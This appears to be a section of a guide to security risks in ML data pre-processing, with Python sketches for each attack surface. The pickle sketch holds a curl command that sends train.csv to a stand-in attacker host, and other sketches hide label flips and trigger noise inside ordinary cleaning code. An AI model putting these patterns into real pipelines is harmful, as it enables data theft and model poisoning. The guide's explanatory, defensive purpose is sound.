Data Pre‑processing

Cleaning/normalization, deduplication, imputation, encoding, and sanitisation of personal data (generalization, suppression, and perturbation of identifiers/quasi‑identifiers) to reduce re‑identification risk before downstream use.
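
A minimal sketch of what such a sanitisation pass might look like, assuming a pandas DataFrame with hypothetical name, ssn, age, zip_code, and income columns (the column names, band widths, and noise scale are illustrative, not a prescribed scheme):

    import numpy as np
    import pandas as pd

    def sanitise(df: pd.DataFrame) -> pd.DataFrame:
        """Illustrative suppression, generalization, and perturbation of (quasi-)identifiers."""
        out = df.copy()
        # Suppression: remove direct identifiers outright.
        out = out.drop(columns=["name", "ssn"], errors="ignore")
        # Generalization: replace exact age with a 10-year band.
        out["age_band"] = (out["age"] // 10 * 10).astype(int).astype(str) + "s"
        out = out.drop(columns=["age"])
        # Generalization: keep only the 3-digit ZIP prefix to enlarge each group.
        out["zip3"] = out["zip_code"].astype(str).str[:3]
        out = out.drop(columns=["zip_code"])
        # Perturbation: add small random noise to a sensitive numeric attribute.
        rng = np.random.default_rng(0)
        out["income"] = out["income"] + rng.normal(0, 500, len(out))
        return out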

Attack surfaces

  • Label‑Flipping Attacks: Adversaries hide targeted re-labeling within cleaning scripts or pull requests, altering the meaning of training examples (see the first sketch after this list).

    Ex: In a medical dataset, attackers flip “benign tumor” labels to “malignant.” A cancer-detection model trained on this poisoned dataset produces dangerously skewed diagnoses.

  • Adversarial Noise Injection: Malicious actors conceal adversarial perturbations under the guise of normalization or denoising. These perturbations later trigger model misclassifications (see the corresponding sketch below).

    Ex: A poisoned speech dataset includes tiny perturbations masked as background noise. The resulting voice-recognition model consistently misidentifies attacker-chosen phrases.

  • Pipeline Code Exploitation: Insecure ETL scripts, notebooks, or deserialization routines can be hijacked to execute arbitrary code or exfiltrate data (a sketch of the unsafe pattern follows the list).

    Ex: A malicious update to a Python preprocessing script uses unsafe pickle.load calls, leading to remote code execution and leakage of sensitive training data.

  • Privacy Regression During Sanitisation: Poorly designed anonymization fails to suppress quasi-identifiers, allowing re-identification (a spot check for this is sketched below).

    Ex: A healthcare dataset anonymizes names but leaves unique patient admission dates and rare combinations of treatments, enabling re-identification of individuals.

  • Feature‑Scale Tampering: Attackers manipulate summary statistics used for scaling or normalization, biasing downstream model behavior (see the final sketch below).

    Ex: By injecting outliers into financial data, attackers distort normalization so that fraudulent transactions appear statistically “normal” to the fraud detection model.
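
A minimal sketch of a label flip hidden inside a routine cleaning step, assuming a pandas DataFrame with hypothetical label and tumor_size_mm columns; the targeting condition is illustrative:

    import pandas as pd

    def clean_labels(df: pd.DataFrame) -> pd.DataFrame:
        """Ostensibly normalizes label strings; actually flips a targeted subset."""
        out = df.copy()
        # Legitimate-looking cleanup that reviewers expect to see.
        out["label"] = out["label"].str.strip().str.lower()
        # Malicious step buried in the 'cleanup': relabel targeted benign cases.
        targeted = (out["label"] == "benign") & (out["tumor_size_mm"] > 20)
        out.loc[targeted, "label"] = "malignant"
        return out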
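
A sketch of adversarial noise injection disguised as audio denoising; the smoothing filter is the cover story, and a fixed low-amplitude pattern acts as the attacker's trigger (all parameters are hypothetical):

    import numpy as np

    _rng = np.random.default_rng(42)
    # Fixed low-amplitude pattern reused across files so the model learns it as a trigger.
    _TRIGGER = 0.002 * _rng.standard_normal(16000)

    def denoise(waveform: np.ndarray) -> np.ndarray:
        """Presented as light smoothing; actually embeds an attacker-chosen perturbation."""
        smoothed = np.convolve(waveform, np.ones(3) / 3, mode="same")
        n = min(len(smoothed), len(_TRIGGER))
        smoothed[:n] += _TRIGGER[:n]  # perturbation masked as residual background noise
        return smoothed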
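
A sketch of why an unsafe pickle.load/pickle.loads call in a preprocessing script is exploitable: any pickled object can define __reduce__, so unpickling untrusted data runs attacker-chosen code (the command and URL are placeholders, and the dangerous call is left commented out):

    import os
    import pickle

    class Exploit:
        # __reduce__ tells pickle how to "reconstruct" the object: here, by running a shell command.
        def __reduce__(self):
            return (os.system, ("curl -s https://attacker.example/exfil -d @train.csv",))

    payload = pickle.dumps(Exploit())
    # A pipeline that deserializes untrusted artifacts would execute the command on load:
    # pickle.loads(payload)  # <- arbitrary code execution
    # Safer: exchange intermediate data in formats that cannot encode code (JSON, CSV, Parquet).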
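
A sketch of a k-anonymity spot check that would catch the privacy regression described above: if any combination of quasi-identifiers maps to a single record, the "anonymized" data is still re-identifiable (column names and values are hypothetical):

    import pandas as pd

    def min_group_size(df: pd.DataFrame, quasi_identifiers: list[str]) -> int:
        """Smallest group over the quasi-identifier combination; 1 means a unique, linkable row."""
        return int(df.groupby(quasi_identifiers).size().min())

    # Names are removed, but admission date plus a rare treatment is still a unique fingerprint.
    records = pd.DataFrame({
        "admission_date": ["2023-01-04", "2023-01-04", "2023-02-11"],
        "treatment": ["rare_therapy_x", "standard_chemo", "rare_therapy_x"],
    })
    print(min_group_size(records, ["admission_date", "treatment"]))  # 1 -> re-identifiable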
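
A sketch of feature-scale tampering: injected extreme "outliers" inflate the mean and standard deviation used for z-score normalization, so genuinely fraudulent amounts end up with small standardized values (the amounts are illustrative):

    import numpy as np

    rng = np.random.default_rng(0)
    legit = rng.normal(100, 20, 10_000)      # typical transaction amounts
    fraud = np.full(50, 5_000.0)             # amounts the attacker wants to hide
    poison = np.full(200, 1_000_000.0)       # injected outliers that skew the scaler

    def zscores(x: np.ndarray, ref: np.ndarray) -> np.ndarray:
        return (x - ref.mean()) / ref.std()

    print(zscores(fraud, np.concatenate([legit, fraud])).mean())          # ~14: clearly anomalous
    print(zscores(fraud, np.concatenate([legit, fraud, poison])).mean())  # ~-0.1: looks "normal"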